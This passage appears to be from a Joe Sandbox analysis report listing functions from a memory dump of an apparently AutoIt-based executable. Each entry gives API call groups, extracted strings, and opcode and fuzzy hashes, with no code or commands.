                                                                                                                    • Opcode ID: 75866f010e58a3fc818b9e79ca1673d0eb2b88fc9f6dc7d78431492add23c59c
                                                                                                                    • Instruction ID: 066744f2a6eb80cc704c4cd3387d7ea136a1528492258a8c85dcd3631c73b96e
                                                                                                                    • Opcode Fuzzy Hash: 75866f010e58a3fc818b9e79ca1673d0eb2b88fc9f6dc7d78431492add23c59c
                                                                                                                    • Instruction Fuzzy Hash: 48E1A512F08A5781EE60DF65DA402B923A0BF50B98B4C4571D95EE77E4EF3EE959C300
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                                                    • String ID: *.*
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                    • String ID: P
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                                                    • String ID: BUTTON
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharDriveLowerTypewcscpy
                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                    • String ID: %s%u
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                                                    • String ID: ThumbnailClass
                                                                                                                    • API String ID: 4010642439-1241985126
                                                                                                                    • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                    • Instruction ID: be324a62527152ae4e33147a03ad1c805c787f5941192e8456515d23bbcbd8a5
                                                                                                                    • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                    • Instruction Fuzzy Hash: 1BA1E532B0864343EA259F15D5446B9A762FF95784F484435CA8EA3A95EF3EF90DCB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 1268354404-3110715001
                                                                                                                    • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                    • Instruction ID: 0ce25715d10ec23f4bcfc95104d91605071153fd18948a75bc9bc1073f15253c
                                                                                                                    • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                    • Instruction Fuzzy Hash: A361D03AA087428AEB54CF26D94467927A1FF84B9CF180535ED0EA7794DF3DE849CB40
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 3297454147-2391861430
                                                                                                                    • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                    • Instruction ID: 79a0664d0da096edada2eed9c8a9461f59e93923967e1b811f084e75cd9a363b
                                                                                                                    • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                    • Instruction Fuzzy Hash: 0A71C935B18A8392EB44DB61E9444FD7321FF40B48F885032EA4DA7699DF7DD94ACB40
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                    • API String ID: 3030280669-22481851
                                                                                                                    • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                    • Instruction ID: 7c2109408806ee724a8be14869338ffb164a9976aa1d819223b78853f5f40b5d
                                                                                                                    • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                    • Instruction Fuzzy Hash: E0510922718B8385EB60DF65E9841ED77A0FB94798F440031EA4DA7A79DF7CD989CB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                    • API String ID: 3827137101-3457252023
                                                                                                                    • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                    • Instruction ID: fef6130c8e5b878e03881f006fee20c1cd42598d81d1faaa00be6d90cd859f98
                                                                                                                    • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                    • Instruction Fuzzy Hash: FB41E72261868385E7609F21EA006FD73A0FF85798F485135DA0DA3BA8DF7DD68EC740
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1255039815-0
                                                                                                                    • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                                                    • Instruction ID: 3390eed66d2eb879c27ec650d7c00899a08e1c6ae9a385954f3042f301204d6d
                                                                                                                    • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                                                    • Instruction Fuzzy Hash: 6A61B232F0475186EB20CFA2D9505AC37B5FB54B99B088035DE8DA3B95DF7AD44AC340
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                    • Instruction ID: 53b2a654b7834886e1325a800f437ff7030697fc781798ac9befc277acd8a551
                                                                                                                    • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                    • Instruction Fuzzy Hash: 6A41A561E0C6C159FB719B6096807792EA1EB25B44F4C4839C78AA32C2CF1FB89CD361
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF655FE6838: CreateFileW.KERNELBASE ref: 00007FF655FE68A2
                                                                                                                      • Part of subcall function 00007FF656004380: GetCurrentDirectoryW.KERNEL32(?,00007FF655FEE817), ref: 00007FF65600439C
                                                                                                                      • Part of subcall function 00007FF655FE56D4: GetFullPathNameW.KERNEL32(?,00007FF655FE56C1,?,00007FF655FE7A0C,?,?,?,00007FF655FE109E), ref: 00007FF655FE56FF
                                                                                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF655FEE8B0
                                                                                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF655FEE9FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                    • API String ID: 2207129308-1018226102
                                                                                                                    • Opcode ID: 2a69bdd886e9ac72b7d1c8a7d9528a7ebc75df003de855e9445a1c7f728e3f3e
                                                                                                                    • Instruction ID: 8fee6344d64498c5291240807d0c820e0e8dc75d1deff4ee400a82e74057090d
                                                                                                                    • Opcode Fuzzy Hash: 2a69bdd886e9ac72b7d1c8a7d9528a7ebc75df003de855e9445a1c7f728e3f3e
                                                                                                                    • Instruction Fuzzy Hash: 8D12F936A0C64386EB50EF25E5445FD7360FB84B98F880132EA4EA7699DF7DD909CB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                    • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                                                    • Instruction ID: 885aef44590e2e6d6af48dcf7f7f86e9c53639aacc98d37cbab164aa5c75e785
                                                                                                                    • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                                                    • Instruction Fuzzy Hash: C9718D22A18B0781EB549F26E6401BD2760FB84F98F584431DE0EA77A5DF7EE48DC300
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
• Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                                                    • String ID:
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$Clear
                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                                    • String ID: -----$SysListView32
                                                                                                                    • API String ID: 2361508679-3975388722
                                                                                                                    • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                                                    • Instruction ID: 5c39a95be1a54c823511cc492251443914b3f3369b6218b4c0f498694cf7796f
                                                                                                                    • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                                                    • Instruction Fuzzy Hash: 5A51C432A047918AE720CF25E9446DE33B5FB84788F44413ADE4D97B55CF3ADA99CB40
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                    • API String ID: 2019164449-3381328864
                                                                                                                    • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                                                    • Instruction ID: 993ecbbdf7ee2e73b586796e3a61526da27d1b51c0df9cdbedc94305d4a4d741
                                                                                                                    • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                                                    • Instruction Fuzzy Hash: 2C214F61B1C54380FE619B12EB487792351AF91B9AF488035C94DE76A5EE6EE20EC700
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1903627254-0
                                                                                                                    • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                                                    • Instruction ID: ec80c97be047d4abc47ff80db2420a7f6b972699b6566109607a0e438cc2abde
                                                                                                                    • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                                                    • Instruction Fuzzy Hash: 4B027D62A18A8682DB50DF2AD5841BD6760FB84F98F584032EF4E97B68CF7DD549CB00
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3210457359-0
                                                                                                                    • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                                                    • Instruction ID: 597643bbe322f09b06cfdf080fa7472934dbcf8a8bf54a0df0c1b4c467a0db29
                                                                                                                    • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                                                    • Instruction Fuzzy Hash: AF61B425A0864386FB74DB25D6417BA2671AF807B8F184131DA1EA36E5CE7FE889D700
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                    • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                                                    • Instruction ID: 1f37d3a683c1f43962ea75c1254f566ba196a41d45b10d820025960434cf1316
                                                                                                                    • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                                                    • Instruction Fuzzy Hash: 00518066A0868282EB14DF26D19537C7B60FF84F99F098435D60DA7792DF7DE509CB00
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                    • String ID: 2$P
                                                                                                                    • API String ID: 93392585-1110268094
                                                                                                                    • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                                    • Instruction ID: 35779e6724a955ebbf08f7348a23edd1a39186d44a9d4bc0e68a2f6c61094992
                                                                                                                    • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                                    • Instruction Fuzzy Hash: E551D432E0865289F720CF66E6402BD37E1BF60758F284135DA5EA3694DF3EE889C700
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$LongMessageSend$Show
                                                                                                                    • String ID: '
                                                                                                                    • API String ID: 257662517-1997036262
                                                                                                                    • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                                                    • Instruction ID: b4db496f6dfd941dc2acf2bf317ce2be343866ec27613526aa7d4bfc2a66459c
                                                                                                                    • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                                                    • Instruction Fuzzy Hash: D6510B32A0864681E360DB66A558A7D3761FB85B94F5C4132CE5EA37B0CF3EED4AC700
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 4060274358-404129466
                                                                                                                    • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                                                    • Instruction ID: 4d84aa13c948caec5f9085157d907628952d8b2df93ef5d49e2f5f83249eb09e
                                                                                                                    • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                                                    • Instruction Fuzzy Hash: 0C216D21B0C79381FA559F16AB0017AA395BF55B90F4C5035DD4DA7396FE7EE40AC300
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 4051287042-3128320259
                                                                                                                    • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                                                    • Instruction ID: 766b77cbc83f1e7af05db630e671b92d5dc0124eec3f18f1ecd598177b883bae
                                                                                                                    • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                                                    • Instruction Fuzzy Hash: 0811C471B28B8595E7358B20F5417FA2365FB98748F88403AEA4EA3B58DE7DC24DC700
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1211466189-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
